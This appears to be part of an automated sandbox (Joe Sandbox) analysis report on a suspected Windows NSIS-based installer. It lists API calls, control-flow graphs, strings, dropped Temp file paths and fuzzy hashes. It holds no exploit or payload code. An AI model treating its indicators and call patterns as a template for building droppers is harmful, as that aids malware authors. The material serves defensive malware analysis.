• GetFileAttributesA.KERNEL32(Call), ref: 004038C3
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243), ref: 0040390C
  • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
• RegisterClassA.USER32(0042EBA0), ref: 00403949
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
• ShowWindow.USER32(00000005,00000000), ref: 004039CC
• GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
• GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
• RegisterClassA.USER32(0042EBA0), ref: 00403A0E
• DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$benevolently Setup: Installing
• API String ID: 1975747703-1868861650
• Opcode ID: d1b3841e1ff9c87adbcfc9175fdeebf26df0ac974e3d7619a30b9a5d2f2d3a26
• Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
• Opcode Fuzzy Hash: d1b3841e1ff9c87adbcfc9175fdeebf26df0ac974e3d7619a30b9a5d2f2d3a26
• Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D

Control-flow Graph
control_flow_graph 364 402d48-402d96 GetTickCount GetModuleFileNameA call 405afe 367 402da2-402dd0 call 405f65 call 405944 call 405f65 GetFileSize 364->367 368 402d98-402d9d 364->368 376 402dd6 367->376 377 402ebd-402ecb call 402ce4 367->377 369 402f7a-402f7e 368->369 378 402ddb-402df2 376->378 383 402f20-402f25 377->383 384 402ecd-402ed0 377->384 381 402df4 378->381 382 402df6-402dff call 403193 378->382 381->382 390 402e05-402e0c 382->390 391 402f27-402f2f call 402ce4 382->391 383->369 386 402ed2-402eea call 4031a9 call 403193 384->386 387 402ef4-402f1e GlobalAlloc call 4031a9 call 402f81 384->387 386->383 410 402eec-402ef2 386->410 387->383 415 402f31-402f42 387->415 394 402e88-402e8c 390->394 395 402e0e-402e22 call 405ab9 390->395 391->383 400 402e96-402e9c 394->400 401 402e8e-402e95 call 402ce4 394->401 395->400 413 402e24-402e2b 395->413 406 402eab-402eb5 400->406 407 402e9e-402ea8 call 4063b4 400->407 401->400 406->378 414 402ebb 406->414 407->406 410->383 410->387 413->400 419 402e2d-402e34 413->419 414->377 416 402f44 415->416 417 402f4a-402f4f 415->417 416->417 420 402f50-402f56 417->420 419->400 421 402e36-402e3d 419->421 420->420 422 402f58-402f73 SetFilePointer call 405ab9 420->422 421->400 423 402e3f-402e46 421->423 427 402f78 422->427 423->400 425 402e48-402e68 423->425 425->383 426 402e6e-402e72 425->426 428 402e74-402e78 426->428 429 402e7a-402e82 426->429 427->369 428->414 428->429 429->400 430 402e84-402e86 429->430 430->400
APIs
• GetTickCount.KERNEL32 ref: 00402D59
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\asXlZG3aW6.exe,00000400), ref: 00402D75
  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
• GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00402DC1
Strings
• Error launching installer, xrefs: 00402D98
• Inst, xrefs: 00402E2D
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
• soft, xrefs: 00402E36
• "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 00402D48
• C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
• Null, xrefs: 00402E3F
• C:\Users\user\Desktop\asXlZG3aW6.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\asXlZG3aW6.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
• API String ID: 4283519449-1047360279
• Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
• Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
• Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
• Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C

Control-flow Graph (function at 0x405f87; executed/not-executed graph rendering omitted; blocks call GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA and subfunctions 405f65, 405ec3, 405f87, 405e4c, 4061cf)
APIs
• GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B2
• GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000), ref: 004060C5
• SHGetSpecialFolderLocation.SHELL32(004050C4,761F23A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000), ref: 00406101
• SHGetPathFromIDListA.SHELL32(761F23A0,Call), ref: 0040610F
• CoTaskMemFree.OLE32(761F23A0), ref: 0040611B
• lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
• lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,00000000,0041AE28,761F23A0), ref: 00406191
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 717251189-339270173
• Opcode ID: c25c6e587ef3fde48e93a35018af7a99bc0d725d9e60a3ed05427843a892e885
• Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
• Opcode Fuzzy Hash: c25c6e587ef3fde48e93a35018af7a99bc0d725d9e60a3ed05427843a892e885
• Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E

Control-flow Graph (function at 0x401759; executed/not-executed graph rendering omitted; blocks call lstrcatA, CompareFileTime, SetFileTime, CloseHandle and subfunctions 402ac1, 40596a, 405f65, 4058fd, 4061cf, 406268, 405ad9, 405afe, 40508c, 402f81, 405f87, 405681)
APIs
• lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,00000031), ref: 00401798
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,00000031), ref: 004017C2
  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
  • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
  • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes$C:\Users\user\AppData\Local\Temp\nsa33B1.tmp$C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll$Call
• API String ID: 1941528284-418975303
• Opcode ID: 4811c27f678321775648cb42fdf4a010893550d1e61fc14233a6adfccbf9552d
• Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
• Opcode Fuzzy Hash: 4811c27f678321775648cb42fdf4a010893550d1e61fc14233a6adfccbf9552d
• Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D

Control-flow Graph (function at 0x402f81; executed/not-executed graph rendering omitted; blocks call GetTickCount, MulDiv, wsprintfA and subfunctions 403193, 4031a9, 405ba5, 406422, 40508c)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: (TA$(TA$... %d%%$W`A
• API String ID: 551687249-3157881336
• Opcode ID: 46c4353731e2246c325a5ee8fa82e7dbf3443aa0b1f18f7fec91e964ca525be6
• Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
• Opcode Fuzzy Hash: 46c4353731e2246c325a5ee8fa82e7dbf3443aa0b1f18f7fec91e964ca525be6
• Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD

Control-flow Graph (function at 0x40508c; executed/not-executed graph rendering omitted; blocks call lstrlenA, lstrcatA, SetWindowTextA, SendMessageA and subfunction 405f87)
APIs
• lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
• lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
• lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
• SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll

Control-flow Graph (function at 00405552; blocks call CreateDirectoryA, GetLastError and SetFileSecurityA; graph image omitted)
APIs
• CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
• GetLastError.KERNEL32 ref: 004055A9
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
• GetLastError.KERNEL32 ref: 004055C8
Strings
• C:\Users\user\Desktop, xrefs: 00405552
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop

Control-flow Graph (function at 0040628F; blocks call GetSystemDirectoryA, wsprintfA and LoadLibraryExA; graph image omitted)
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
• wsprintfA.USER32 ref: 004062DF
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%s.dll$UXTHEME$\

Control-flow Graph (function at 00405B2D; blocks call GetTickCount and GetTempFileNameA; graph image omitted)
APIs
• GetTickCount.KERNEL32 ref: 00405B41
• GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
Strings
• "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 00405B2D
• nsa, xrefs: 00405B38
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$nsa

Control-flow Graph (node/edge listing; executed/not-executed colouring not recoverable from the extracted text)
control_flow_graph 725 100016bd-100016f9 call 10001a5d 729 1000180a-1000180c 725->729 730 100016ff-10001703 725->730 731 10001705-1000170b call 100021b0 730->731 732 1000170c-10001719 call 100021fa 730->732 731->732 737 10001749-10001750 732->737 738 1000171b-10001720 732->738 739 10001770-10001774 737->739 740 10001752-1000176e call 100023d8 call 10001559 call 10001266 GlobalFree 737->740 741 10001722-10001723 738->741 742 1000173b-1000173e 738->742 745 100017b2-100017b8 call 100023d8 739->745 746 10001776-100017b0 call 10001559 call 100023d8 739->746 766 100017b9-100017bd 740->766 743 10001725-10001726 741->743 744 1000172b-1000172c call 100027e4 741->744 742->737 747 10001740-10001741 call 10002a9f 742->747 750 10001733-10001739 call 10002587 743->750 751 10001728-10001729 743->751 757 10001731 744->757 745->766 746->766 760 10001746 747->760 765 10001748 750->765 751->737 751->744 757->760 760->765 765->737 769 100017fa-10001801 766->769 770 100017bf-100017cd call 1000239e 766->770 769->729 773 10001803-10001804 GlobalFree 769->773 775 100017e5-100017ec 770->775 776 100017cf-100017d2 770->776 773->729 775->769 778 100017ee-100017f9 call 100014e2 775->778 776->775 777 100017d4-100017dc 776->777 777->775 779 100017de-100017df FreeLibrary 777->779 778->769 779->775
APIs
  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
  • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
• GlobalFree.KERNEL32(00000000), ref: 10001768
• FreeLibrary.KERNEL32(?), ref: 100017DF
• GlobalFree.KERNEL32(00000000), ref: 10001804
  • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
  • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
  • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
Strings
Memory Dump Source
• Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpy
• String ID:
• API String ID: 1791698881-3916222277
• Opcode ID: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
• Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
• Opcode Fuzzy Hash: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
• Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60

Control-flow Graph (node/edge listing; executed/not-executed colouring not recoverable from the extracted text)
control_flow_graph 782 401c04-401c24 call 402a9f * 2 787 401c30-401c34 782->787 788 401c26-401c2d call 402ac1 782->788 790 401c40-401c46 787->790 791 401c36-401c3d call 402ac1 787->791 788->787 792 401c94-401cba call 402ac1 * 2 FindWindowExA 790->792 793 401c48-401c64 call 402a9f * 2 790->793 791->790 807 401cc0 792->807 805 401c84-401c92 SendMessageA 793->805 806 401c66-401c82 SendMessageTimeoutA 793->806 805->807 808 401cc3-401cc6 806->808 807->808 809 402951-402960 808->809 810 401ccc 808->810 810->809
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
• Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
• Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
• Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
APIs
• GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
  • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
  • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
• GetProcAddress.KERNEL32(00000000,?), ref: 00402048
• FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID:
• API String ID: 2987980305-0
• Opcode ID: 8f2f68fe1260159639bfb28b43f5715fe2f8d879f7a621fd8f0c8717e3dae319
• Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
